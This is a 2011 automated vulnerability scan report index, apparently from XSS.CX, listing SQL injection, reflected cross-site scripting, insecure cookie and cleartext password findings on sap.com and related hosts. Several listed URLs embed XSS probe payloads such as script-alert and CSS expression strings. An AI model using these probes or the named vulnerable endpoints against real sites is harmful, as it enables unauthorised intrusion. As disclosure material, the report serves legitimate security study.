XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, sap.com

Profile of sap.com and connected HTTP Systems

Report generated by XSS.CX at Sat Oct 15 10:38:55 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. SQL injection

1.1. https://teched2011madrid.sapevents.com/index.cfm [error parameter]

1.2. http://weblogs.sdn.sap.com/pub/t/27 [REST URL parameter 3]

2. HTTP header injection

3. Cross-site scripting (reflected)

3.1. http://ecohub.sap.com/img/assets/mobility/unwired.jpg [REST URL parameter 1]

3.2. http://ecohub.sap.com/img/assets/mobility/unwired.jpg [REST URL parameter 2]

3.3. http://ecohub.sap.com/img/assets/mobility/unwired.jpg [REST URL parameter 3]

3.4. http://ecohub.sap.com/img/assets/mobility/unwired.jpg [REST URL parameter 4]

3.5. http://ecohub.sap.com/img/banners/Madrid.288.png [REST URL parameter 1]

3.6. http://ecohub.sap.com/img/banners/Madrid.288.png [REST URL parameter 2]

3.7. http://ecohub.sap.com/img/banners/Madrid.288.png [REST URL parameter 3]

3.8. http://ecohub.sap.com/img/banners/womanmanmonitor_vertical.jpg [REST URL parameter 1]

3.9. http://ecohub.sap.com/img/banners/womanmanmonitor_vertical.jpg [REST URL parameter 2]

3.10. http://ecohub.sap.com/img/banners/womanmanmonitor_vertical.jpg [REST URL parameter 3]

3.11. http://ecohub.sap.com/img/banners/world-tour.288.jpg [REST URL parameter 1]

3.12. http://ecohub.sap.com/img/banners/world-tour.288.jpg [REST URL parameter 2]

3.13. http://ecohub.sap.com/img/banners/world-tour.288.jpg [REST URL parameter 3]

3.14. http://ecohub.sap.com/img/empty.gif [REST URL parameter 1]

3.15. http://ecohub.sap.com/img/empty.gif [REST URL parameter 2]

3.16. http://ecohub.sap.com/js/ecohub.js [REST URL parameter 1]

3.17. http://ecohub.sap.com/js/ecohub.js [REST URL parameter 2]

3.18. http://ecohub.sap.com/js/jquery-1.5.2.min.js [REST URL parameter 1]

3.19. http://ecohub.sap.com/js/jquery-1.5.2.min.js [REST URL parameter 2]

3.20. http://ecohub.sap.com/stylesheets/style.css [REST URL parameter 1]

3.21. http://ecohub.sap.com/stylesheets/style.css [REST URL parameter 2]

3.22. http://ecohub.sap.com/stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css [REST URL parameter 1]

3.23. http://ecohub.sap.com/stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css [REST URL parameter 2]

3.24. http://ecohub.sap.com/stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css [REST URL parameter 2]

3.25. http://ecohub.sap.com/stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css [REST URL parameter 3]

3.26. http://forums.sdn.sap.com/forum.jspa [forumID parameter]

3.27. http://forums.sdn.sap.com/forum.jspa [name of an arbitrarily supplied request parameter]

3.28. http://forums.sdn.sap.com/forum.jspa [name of an arbitrarily supplied request parameter]

3.29. http://forums.sdn.sap.com/forum.jspa [start parameter]

3.30. http://forums.sdn.sap.com/thread.jspa [name of an arbitrarily supplied request parameter]

3.31. http://forums.sdn.sap.com/thread.jspa [name of an arbitrarily supplied request parameter]

3.32. http://forums.sdn.sap.com/thread.jspa [threadID parameter]

3.33. http://forums.sdn.sap.com/thread.jspa [tstart parameter]

3.34. http://nmp.newsgator.com/NGBuzz/buzz.ashx [_dsrId parameter]

3.35. http://nmp.newsgator.com/NGBuzz/buzz.ashx [buzzId parameter]

3.36. http://nmp.newsgator.com/NGBuzz/buzz.ashx [name of an arbitrarily supplied request parameter]

3.37. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard [mbox parameter]

3.38. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mbox parameter]

3.39. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mboxId parameter]

3.40. http://omniturestaging.staging.tt.omtrdc.net/m2/omniturestaging/mbox/standard [mbox parameter]

3.41. http://omniturestaging.staging.tt.omtrdc.net/m2/omniturestaging/mbox/standard [mboxFactoryId parameter]

3.42. http://sales.liveperson.net/hc/37021986/ [msessionkey parameter]

3.43. https://sales.liveperson.net/hc/37021986/ [msessionkey parameter]

3.44. http://sapglobalmarketingin.tt.omtrdc.net/m2/sapglobalmarketingin/sc/standard [mbox parameter]

3.45. http://sapglobalmarketingin.tt.omtrdc.net/m2/sapglobalmarketingin/sc/standard [mboxId parameter]

3.46. http://smepartnerfinder.sap.com/FlashIFrame.aspx [lang parameter]

3.47. http://weblogs.sdn.sap.com/cs/user/create/cs_msg [39359%22%3E%3Cscript%3Ealert(1)%3C/script%3E322e7d1fcaf parameter]

3.48. http://weblogs.sdn.sap.com/cs/user/create/cs_msg [REST URL parameter 4]

3.49. http://weblogs.sdn.sap.com/cs/user/create/cs_msg [name of an arbitrarily supplied request parameter]

3.50. http://weblogs.sdn.sap.com/cs/user/create/cs_msg [page parameter]

3.51. http://weblogs.sdn.sap.com/cs/user/create/cs_msg [x-lr parameter]

3.52. http://weblogs.sdn.sap.com/cs/user/create/cs_msg [x-lr2 parameter]

3.53. http://weblogs.sdn.sap.com/cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb [REST URL parameter 4]

3.54. http://weblogs.sdn.sap.com/cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb [REST URL parameter 4]

3.55. http://weblogs.sdn.sap.com/cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb [REST URL parameter 5]

3.56. http://weblogs.sdn.sap.com/cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb [REST URL parameter 5]

3.57. http://weblogs.sdn.sap.com/cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb [name of an arbitrarily supplied request parameter]

3.58. http://weblogs.sdn.sap.com/cs/user/login [x-redirect parameter]

3.59. http://weblogs.sdn.sap.com/cs/user/login [x-redirect parameter]

3.60. http://www.asugonline.com/weborb.aspx [2nd AMF string parameter]

3.61. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [b parameter]

3.62. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [h parameter]

3.63. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [path parameter]

3.64. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [scbcolor parameter]

3.65. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [tbcolor parameter]

3.66. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [tipbcolor parameter]

3.67. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [tipbgcolor parameter]

3.68. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [tipborderw parameter]

3.69. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [tiptcolor parameter]

3.70. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [tipw parameter]

3.71. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [w parameter]

3.72. http://www.sap.com/about-sap/company/legal/privacy.epx [name of an arbitrarily supplied request parameter]

3.73. http://www.sap.com/global/js/addthis_widget.js [REST URL parameter 1]

3.74. http://www.sap.com/global/swf/Flash_Header_V2.swf [REST URL parameter 1]

3.75. http://www.sap.com/global/ui/fonts/bensbk-webfont.ttf [REST URL parameter 1]

3.76. http://www.sap.com/global/ui/js/common.js [REST URL parameter 1]

3.77. http://www.sap.com/global/ui/js/head.js [REST URL parameter 1]

3.78. http://www.sap.com/gwtservice.epx [REST URL parameter 1]

3.79. http://www.sap.com/gwtservices/httpBridge.epx [REST URL parameter 1]

3.80. http://www.sap.com/news-reader/ [REST URL parameter 1]

3.81. http://www.sap.com/print/sme/search/SAP_nn6.js [REST URL parameter 1]

3.82. http://www.sap.com/print/zzzzzz=yyyyy [REST URL parameter 1]

3.83. http://www.sap.com/sme/search/SAP_nn6.js [REST URL parameter 1]

3.84. http://www.sap.com/text/sme/search/SAP_nn6.js [REST URL parameter 1]

3.85. http://www.sap.com/text/zzzzzz=yyyyy [REST URL parameter 1]

3.86. https://www.sap.com/contactsap/contact_warning.epx [name of an arbitrarily supplied request parameter]

3.87. https://www.sap.com/profile/warning.epx [name of an arbitrarily supplied request parameter]

3.88. http://www.sapbusinessoptimizer.com/ [xajax parameter]

3.89. http://www.sapbusinessoptimizer.com/css/fancy-popup-styles.css [REST URL parameter 1]

3.90. http://www.sapbusinessoptimizer.com/css/fancy-popup-styles.css [REST URL parameter 1]

3.91. http://www.sapbusinessoptimizer.com/css/fancy-popup-styles.css [REST URL parameter 2]

3.92. http://www.sapbusinessoptimizer.com/css/fancy-popup-styles.css [REST URL parameter 2]

3.93. http://www.sapbusinessoptimizer.com/favicon.ico [REST URL parameter 1]

3.94. http://www.sapbusinessoptimizer.com/favicon.ico [REST URL parameter 1]

3.95. http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f [REST URL parameter 1]

3.96. http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f [REST URL parameter 1]

3.97. http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f [REST URL parameter 2]

3.98. http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f [REST URL parameter 2]

3.99. http://www.sapbusinessoptimizer.com/fonts/SAPSans2007ExtraBoldCond.woff [REST URL parameter 1]

3.100. http://www.sapbusinessoptimizer.com/fonts/SAPSans2007ExtraBoldCond.woff [REST URL parameter 1]

3.101. http://www.sapbusinessoptimizer.com/fonts/SAPSans2007ExtraBoldCond.woff [REST URL parameter 2]

3.102. http://www.sapbusinessoptimizer.com/fonts/SAPSans2007ExtraBoldCond.woff [REST URL parameter 2]

3.103. http://www.sapbusinessoptimizer.com/js/swc/common.tao [REST URL parameter 1]

3.104. http://www.sapbusinessoptimizer.com/js/swc/common.tao [REST URL parameter 1]

3.105. http://www.sapbusinessoptimizer.com/js/swc/common.tao [REST URL parameter 2]

3.106. http://www.sapbusinessoptimizer.com/js/swc/common.tao [REST URL parameter 2]

3.107. http://www.sapbusinessoptimizer.com/js/swc/common.tao [REST URL parameter 3]

3.108. http://www.sapbusinessoptimizer.com/js/swc/common.tao [REST URL parameter 3]

3.109. http://www.sapphirenow.com/login.aspx [ReturnUrl parameter]

3.110. http://www.sapphirenow.com/login.aspx [a00f1%22style%3d%22x%3aexpression(alert(1))%225e28a9da3e5 parameter]

3.111. http://www.sapphirenow.com/login.aspx [name of an arbitrarily supplied request parameter]

3.112. http://www.sapvirtualevents.com/teched [name of an arbitrarily supplied request parameter]

3.113. http://www.sapvirtualevents.com/teched/ [name of an arbitrarily supplied request parameter]

3.114. http://www.sapvirtualevents.com/teched/Sessions.aspx [name of an arbitrarily supplied request parameter]

3.115. http://www.sapvirtualevents.com/teched/default.aspx [name of an arbitrarily supplied request parameter]

3.116. http://www.sapvirtualevents.com/teched/login.aspx [ReturnUrl parameter]

3.117. http://www.sapvirtualevents.com/teched/sessiondetails.aspx [name of an arbitrarily supplied request parameter]

3.118. http://www.sdn.sap.com/irj/scn/advancedsearch [name of an arbitrarily supplied request parameter]

3.119. http://www.sdn.sap.com/irj/scn/advancedsearch [query parameter]

3.120. http://www.sdn.sap.com/irj/scn/bc [name of an arbitrarily supplied request parameter]

3.121. http://www.sdn.sap.com/irj/scn/downloads [name of an arbitrarily supplied request parameter]

3.122. http://www.sdn.sap.com/irj/scn/index [name of an arbitrarily supplied request parameter]

3.123. http://www.sdn.sap.com/irj/scn/logon [name of an arbitrarily supplied request parameter]

3.124. http://www.sdn.sap.com/irj/scn/sdnweblogs/popularposts [name of an arbitrarily supplied request parameter]

3.125. http://www.sdn.sap.com/irj/scn/weblogs [blog parameter]

3.126. http://www.sdn.sap.com/irj/scn/weblogs [name of an arbitrarily supplied request parameter]

3.127. http://www.sdn.sap.com/irj/sdn/logon [name of an arbitrarily supplied request parameter]

3.128. http://www.sdn.sap.com/irj/sdn/mypoints [name of an arbitrarily supplied request parameter]

3.129. https://www.sme.sap.com/irj/sme/cpslogon [RelayState parameter]

3.130. https://www.sme.sap.com/irj/sme/cpslogon [SAMLRequest parameter]

3.131. https://www.sme.sap.com/irj/sme/cpslogon [name of an arbitrarily supplied request parameter]

3.132. https://www.sme.sap.com/irj/sme/logon [name of an arbitrarily supplied request parameter]

3.133. https://www.sme.sap.com/irj/sme/memberlogin [name of an arbitrarily supplied request parameter]

3.134. https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx [Referer HTTP header]

3.135. https://www.sap.com/sme/contactsap/index.epx [Referer HTTP header]

3.136. https://www.sap.com/sme/contactsap/index.epx [Referer HTTP header]

3.137. http://info.newsgator.com/Trial_SocialSites2010.html [_mkto_trk cookie]

3.138. http://sales.liveperson.net/hc/37021986/ [HumanClickKEY cookie]

3.139. https://www.sap.com/host.epx [pmelayerurl cookie]

4. Flash cross-domain policy

4.1. http://fls.doubleclick.net/crossdomain.xml

4.2. http://ib.adnxs.com/crossdomain.xml

4.3. http://leads.demandbase.com/crossdomain.xml

4.4. http://omnituremarketing.d1.sc.omtrdc.net/crossdomain.xml

4.5. http://omnituremarketing.tt.omtrdc.net/crossdomain.xml

4.6. http://omniturestaging.staging.tt.omtrdc.net/crossdomain.xml

4.7. http://pixel.mathtag.com/crossdomain.xml

4.8. http://sap.112.2o7.net/crossdomain.xml

4.9. http://static.2mdn.net/crossdomain.xml

4.10. http://pubads.g.doubleclick.net/crossdomain.xml

4.11. http://www.connect.facebook.com/crossdomain.xml

4.12. http://www.facebook.com/crossdomain.xml

4.13. http://www.sap.com/crossdomain.xml

4.14. https://www.sap.com/crossdomain.xml

4.15. http://www.sapphirenow.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://omnituremarketing.d1.sc.omtrdc.net/clientaccesspolicy.xml

5.2. http://sap.112.2o7.net/clientaccesspolicy.xml

5.3. http://static.2mdn.net/clientaccesspolicy.xml

6. Cleartext submission of password

6.1. http://www.asugonline.com/cms/FormBuilder/Register.aspx

6.2. http://www.sapbusinessoptimizer.com/

6.3. http://www.sapphirenow.com/login.aspx

6.4. http://www.sapvirtualevents.com/teched/login.aspx

6.5. http://www.sdn.sap.com/irj/scn/advancedsearch

6.6. http://www.sdn.sap.com/irj/scn/downloads

6.7. http://www.sdn.sap.com/irj/scn/index

6.8. http://www.sdn.sap.com/irj/scn/logon

6.9. http://www.sdn.sap.com/irj/scn/sdnweblogs/popularposts

6.10. http://www.sdn.sap.com/irj/scn/weblogs

6.11. http://www.sdn.sap.com/irj/sdn/logon

6.12. http://www.sdn.sap.com/irj/sdn/mypoints

7. XML injection

7.1. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 1]

7.2. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 2]

7.3. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 3]

8. SSL cookie without secure flag set

8.1. https://s.analytics.yahoo.com/fpc.pl

8.2. https://sales.liveperson.net/visitor/addons/deploy2.asp

8.3. https://sales.liveperson.net/visitor/addons/deploy2.asp

8.4. https://sapphire-nowmadrid.sapevents.com/

8.5. https://wiki.sdn.sap.com/wiki/display/HOME

8.6. https://sales.liveperson.net/hc/37021986/

8.7. https://store.sap.com/sap/ap/ui/repository/store/StartPage.html

8.8. https://training.sap.com/

8.9. https://www.sap.com/WebResource.axd

8.10. https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/Tracking.epi

8.11. https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx

8.12. https://www.sap.com/contactsap/contact_warning.epx

8.13. https://www.sap.com/contactsap/index.epx

8.14. https://www.sap.com/host.epx

8.15. https://www.sap.com/omni.epx

8.16. https://www.sap.com/profile/captcha.epimg

8.17. https://www.sap.com/profile/login.epx

8.18. https://www.sap.com/profile/slogin.epx

8.19. https://www.sap.com/profile/warning.epx

8.20. https://www.sap.com/sme/contactsap/FormCodesRemote.epi

8.21. https://www.sap.com/sme/contactsap/index.epx

8.22. https://www.sme.sap.com/irj/sme/cpslogon

9. Session token in URL

9.1. http://nmp.newsgator.com/NGBuzz/buzz.ashx

9.2. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard

9.3. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard

9.4. http://omniturestaging.staging.tt.omtrdc.net/m2/omniturestaging/mbox/standard

9.5. http://sales.liveperson.net/hc/37021986/

9.6. http://sales.liveperson.net/hc/37021986/cmd/url/

9.7. https://sales.liveperson.net/hc/37021986/

9.8. http://sapglobalmarketingin.tt.omtrdc.net/m2/sapglobalmarketingin/sc/standard

9.9. https://teched2011madrid.sapevents.com/index.cfm

9.10. http://www.sapteched.com/emea/about/whoshouldattend.htm

10. Password field submitted using GET method

11. Cookie scoped to parent domain

11.1. https://s.analytics.yahoo.com/fpc.pl

11.2. http://www.sap.com/

11.3. http://ib.adnxs.com/getuid

11.4. http://ib.adnxs.com/px

11.5. http://reservoir.marketstudio.net/reservoir

11.6. http://sales.liveperson.net/hc/37021986/

11.7. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php

11.8. http://segment-pixel.invitemedia.com/set_partner_uid

11.9. http://tracker.marinsm.com/tp

11.10. https://training.sap.com/

11.11. http://www.sap.com/Tracking.epi

11.12. http://www.sap.com/about-sap/company/legal/privacy.epx

11.13. http://www.sap.com/about-sap/events/worldtour/index.epx

11.14. http://www.sap.com/asset/index.epx

11.15. http://www.sap.com/buy-now/index.epx

11.16. http://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx

11.17. http://www.sap.com/common/formAbandonWarning.epx

11.18. http://www.sap.com/country-selector.epx

11.19. http://www.sap.com/customer-showcase/growth/index.epx

11.20. http://www.sap.com/customer-showcase/innovation/index.epx

11.21. http://www.sap.com/customer-showcase/meetcustomers/index.epx

11.22. http://www.sap.com/customer-testimonials/index.epx

11.23. http://www.sap.com/gwtservice.epx

11.24. http://www.sap.com/gwtservices/httpBridge.epx

11.25. http://www.sap.com/gwtservices/verifylogin.epx

11.26. http://www.sap.com/hana/index.epx

11.27. http://www.sap.com/index.epx

11.28. http://www.sap.com/lines-of-business/index.epx

11.29. http://www.sap.com/lines-of-business/lines-of-business-spotlight.epx

11.30. http://www.sap.com/news-reader/

11.31. http://www.sap.com/news-reader/index.epx

11.32. http://www.sap.com/partners/partnerwithsap/business-objects-crystal/north-american-resellers.epx

11.33. http://www.sap.com/print/sme/search/SAP_nn6.js

11.34. http://www.sap.com/print/zzzzzz=yyyyy

11.35. http://www.sap.com/search/index.epx

11.36. http://www.sap.com/search/search-results.epx

11.37. http://www.sap.com/siteservice.epx

11.38. http://www.sap.com/sme/howtobuy/solution_adviser.epx

11.39. http://www.sap.com/sme/partners/findpartner/index.epx

11.40. http://www.sap.com/sme/search/SAP_nn6.js

11.41. http://www.sap.com/sme/search/index.epx

11.42. http://www.sap.com/sme/seeitinaction/customerreferences.epx

11.43. http://www.sap.com/sme/seeitinaction/index.epx

11.44. http://www.sap.com/sme/seeitinaction/overviewvideos.epx

11.45. http://www.sap.com/sme/seeitinaction/seealldemos.epx

11.46. http://www.sap.com/sme/seeitinaction/solutiondemos.epx

11.47. http://www.sap.com/sme/solutions/businessmanagement/index.epx

11.48. http://www.sap.com/solutions/business-suite/scm/featuresfunctions/execution/transportationmanagement.epx

11.49. http://www.sap.com/solutions/products/sales-on-demand/index.epx

11.50. http://www.sap.com/solutions/products/sap-bydesign/index.epx

11.51. http://www.sap.com/solutions/rapid-deployment/index.epx

11.52. http://www.sap.com/solutions/sap-crystal-solutions/index.epx

11.53. http://www.sap.com/solutions/sme.epx

11.54. http://www.sap.com/text/sme/search/SAP_nn6.js

11.55. http://www.sap.com/text/zzzzzz=yyyyy

11.56. http://www.sap.com/zzzzzz=yyyyy

11.57. https://www.sap.com/WebResource.axd

11.58. https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/Tracking.epi

11.59. https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx

11.60. https://www.sap.com/contactsap/contact_warning.epx

11.61. https://www.sap.com/contactsap/index.epx

11.62. https://www.sap.com/host.epx

11.63. https://www.sap.com/omni.epx

11.64. https://www.sap.com/profile/captcha.epimg

11.65. https://www.sap.com/profile/login.epx

11.66. https://www.sap.com/profile/slogin.epx

11.67. https://www.sap.com/profile/warning.epx

11.68. https://www.sap.com/sme/contactsap/FormCodesRemote.epi

11.69. https://www.sap.com/sme/contactsap/index.epx

11.70. http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/webcontent/uuid/a039063f-0894-2b10-ef89-c40583db85cd

11.71. https://www.sme.sap.com/irj/sme/cpslogon

12. Cookie without HttpOnly flag set

12.1. http://ecohub.sap.com/

12.2. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard

12.3. http://omniturestaging.staging.tt.omtrdc.net/m2/omniturestaging/mbox/standard

12.4. https://s.analytics.yahoo.com/fpc.pl

12.5. http://sales.liveperson.net/visitor/addons/deploy2.asp

12.6. http://sales.liveperson.net/visitor/addons/deploy2.asp

12.7. http://sales.liveperson.net/visitor/addons/deploy2.asp

12.8. http://sales.liveperson.net/visitor/addons/deploy2.asp

12.9. http://sales.liveperson.net/visitor/addons/deploy2.asp

12.10. http://sales.liveperson.net/visitor/addons/deploy2.asp

12.11. http://sales.liveperson.net/visitor/addons/deploy2.asp

12.12. https://sales.liveperson.net/visitor/addons/deploy2.asp

12.13. https://sales.liveperson.net/visitor/addons/deploy2.asp

12.14. https://sapphire-nowmadrid.sapevents.com/

12.15. http://store.businessobjects.com/DRHM/store

12.16. http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.%2077298800

12.17. http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800

12.18. http://store.businessobjects.com/store/bobjamer/en_US/DisplayCategoryProductListPage/categoryID.57066000/parentCategoryID.57065700

12.19. http://wiki.sdn.sap.com/wiki/display/events/SAP+TechEd

12.20. https://wiki.sdn.sap.com/wiki/display/HOME

12.21. http://www.sap.com/

12.22. http://www.sapandasug.com/

12.23. http://www.sapevents.com/SAP/SAPPHIRE2010FRANKFURT/index.cfm

12.24. http://www.sapevents.com/SAP/WorldTour2011/index.cfm

12.25. http://www.sapteched.com/china/11/cn/index/home.asp

12.26. http://www.sapteched.com/sapphirenowsaptechedmadrid/

12.27. http://www.sapvirtualevents.com/teched/login.aspx

12.28. http://ecohub.sdn.sap.com/irj/ecohub/go/portal/prtroot/docs/hub/uuid/a0002167-ef09-2e10-2bad-9172f36621f6

12.29. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard

12.30. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard

12.31. http://omniturestaging.staging.tt.omtrdc.net/m2/omniturestaging/mbox/standard

12.32. http://reservoir.marketstudio.net/reservoir

12.33. http://sales.liveperson.net/hc/37021986/

12.34. http://sales.liveperson.net/hc/37021986/

12.35. http://sales.liveperson.net/hc/37021986/cmd/url/

12.36. https://sales.liveperson.net/hc/37021986/

12.37. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php

12.38. http://segment-pixel.invitemedia.com/set_partner_uid

12.39. http://ssl-hints.netflame.cc/service/hint/C2033968180

12.40. http://store.businessobjects.com/store/bobjamer/en_US/DisplayCategoryProductListPage/categoryID.57066000/parentCategoryID.57065700

12.41. http://store.businessobjects.com/store/bobjects/Content/pbPage.sap_countryselector/pgm.76865500

12.42. http://store.businessobjects.com/store/bobjects/Content/pbPage.sap_countryselector/pgm.77505400

12.43. https://store.sap.com/sap/ap/ui/repository/store/StartPage.html

12.44. http://t2.trackalyzer.com/trackalyze.asp

12.45. http://teched2011madrid.sapevents.com/index.cfm

12.46. http://tracker.marinsm.com/tp

12.47. http://www.sap.com/Tracking.epi

12.48. http://www.sap.com/about-sap/company/legal/privacy.epx

12.49. http://www.sap.com/about-sap/events/worldtour/index.epx

12.50. http://www.sap.com/asset/index.epx

12.51. http://www.sap.com/buy-now/index.epx

12.52. http://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx

12.53. http://www.sap.com/common/formAbandonWarning.epx

12.54. http://www.sap.com/country-selector.epx

12.55. http://www.sap.com/customer-showcase/growth/index.epx

12.56. http://www.sap.com/customer-showcase/innovation/index.epx

12.57. http://www.sap.com/customer-showcase/meetcustomers/index.epx

12.58. http://www.sap.com/customer-testimonials/index.epx

12.59. http://www.sap.com/global/client_functions.js

12.60. http://www.sap.com/global/css/Flyouts.css

12.61. http://www.sap.com/global/css/MainContentPanel.css

12.62. http://www.sap.com/global/css/MainLeftPanel.css

12.63. http://www.sap.com/global/css/MainRightPanel.css

12.64. http://www.sap.com/global/css/dropdownlist.css

12.65. http://www.sap.com/global/css/full_browser_pc_ie.css

12.66. http://www.sap.com/global/js/Validations.js

12.67. http://www.sap.com/global/js/jquery-1_3_2/jquery-1.3.2.min.js

12.68. http://www.sap.com/global/unified/css/StageHeaderMainFooter.css

12.69. http://www.sap.com/gwtservice.epx

12.70. http://www.sap.com/gwtservices/httpBridge.epx

12.71. http://www.sap.com/gwtservices/verifylogin.epx

12.72. http://www.sap.com/hana/index.epx

12.73. http://www.sap.com/index.epx

12.74. http://www.sap.com/lines-of-business/index.epx

12.75. http://www.sap.com/lines-of-business/lines-of-business-spotlight.epx

12.76. http://www.sap.com/news-reader/

12.77. http://www.sap.com/news-reader/index.epx

12.78. http://www.sap.com/partners/partnerwithsap/business-objects-crystal/north-american-resellers.epx

12.79. http://www.sap.com/print/sme/search/SAP_nn6.js

12.80. http://www.sap.com/print/zzzzzz=yyyyy

12.81. http://www.sap.com/search/index.epx

12.82. http://www.sap.com/search/search-results.epx

12.83. http://www.sap.com/siteservice.epx

12.84. http://www.sap.com/sme/howtobuy/solution_adviser.epx

12.85. http://www.sap.com/sme/partners/findpartner/index.epx

12.86. http://www.sap.com/sme/search/SAP_nn6.js

12.87. http://www.sap.com/sme/search/index.epx

12.88. http://www.sap.com/sme/seeitinaction/customerreferences.epx

12.89. http://www.sap.com/sme/seeitinaction/index.epx

12.90. http://www.sap.com/sme/seeitinaction/overviewvideos.epx

12.91. http://www.sap.com/sme/seeitinaction/seealldemos.epx

12.92. http://www.sap.com/sme/seeitinaction/solutiondemos.epx

12.93. http://www.sap.com/sme/solutions/businessmanagement/index.epx

12.94. http://www.sap.com/solutions/business-suite/scm/featuresfunctions/execution/transportationmanagement.epx

12.95. http://www.sap.com/solutions/products/sales-on-demand/index.epx

12.96. http://www.sap.com/solutions/products/sap-bydesign/index.epx

12.97. http://www.sap.com/solutions/rapid-deployment/index.epx

12.98. http://www.sap.com/solutions/sap-crystal-solutions/index.epx

12.99. http://www.sap.com/solutions/sme.epx

12.100. http://www.sap.com/text/sme/search/SAP_nn6.js

12.101. http://www.sap.com/text/zzzzzz=yyyyy

12.102. http://www.sap.com/zzzzzz=yyyyy

12.103. https://www.sap.com/WebResource.axd

12.104. https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/Tracking.epi

12.105. https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx

12.106. https://www.sap.com/contactsap/contact_warning.epx

12.107. https://www.sap.com/contactsap/index.epx

12.108. https://www.sap.com/host.epx

12.109. https://www.sap.com/omni.epx

12.110. https://www.sap.com/profile/captcha.epimg

12.111. https://www.sap.com/profile/login.epx

12.112. https://www.sap.com/profile/slogin.epx

12.113. https://www.sap.com/profile/warning.epx

12.114. https://www.sap.com/sme/contactsap/FormCodesRemote.epi

12.115. https://www.sap.com/sme/contactsap/index.epx

12.116. http://www.sapphirenow.com/madrid

12.117. http://www.sapvirtualevents.com/App_Themes/Default/default.css

12.118. http://www.sapvirtualevents.com/App_Themes/Default/form.css

12.119. http://www.sapvirtualevents.com/App_Themes/Default/images/sap-logo.png

12.120. http://www.sapvirtualevents.com/css/thickbox.css

12.121. http://www.sapvirtualevents.com/css/timetable.css

12.122. http://www.sapvirtualevents.com/js/Constant.js

12.123. http://www.sapvirtualevents.com/js/DateFormatter.js

12.124. http://www.sapvirtualevents.com/js/EditProfile.js

12.125. http://www.sapvirtualevents.com/js/InitiateCall2.js

12.126. http://www.sapvirtualevents.com/js/clear-form.js

12.127. http://www.sapvirtualevents.com/js/form.js

12.128. http://www.sapvirtualevents.com/js/html5.js

12.129. http://www.sapvirtualevents.com/js/jquery-1.4.4.min.js

12.130. http://www.sapvirtualevents.com/js/jquery-jtemplates.js

12.131. http://www.sapvirtualevents.com/js/jquery_.main.js

12.132. http://www.sapvirtualevents.com/js/json2.js

12.133. http://www.sapvirtualevents.com/js/mtagconfig.js

12.134. http://www.sapvirtualevents.com/js/securelayers.js

12.135. http://www.sapvirtualevents.com/js/slideBlock.js

12.136. http://www.sapvirtualevents.com/js/thickbox.js

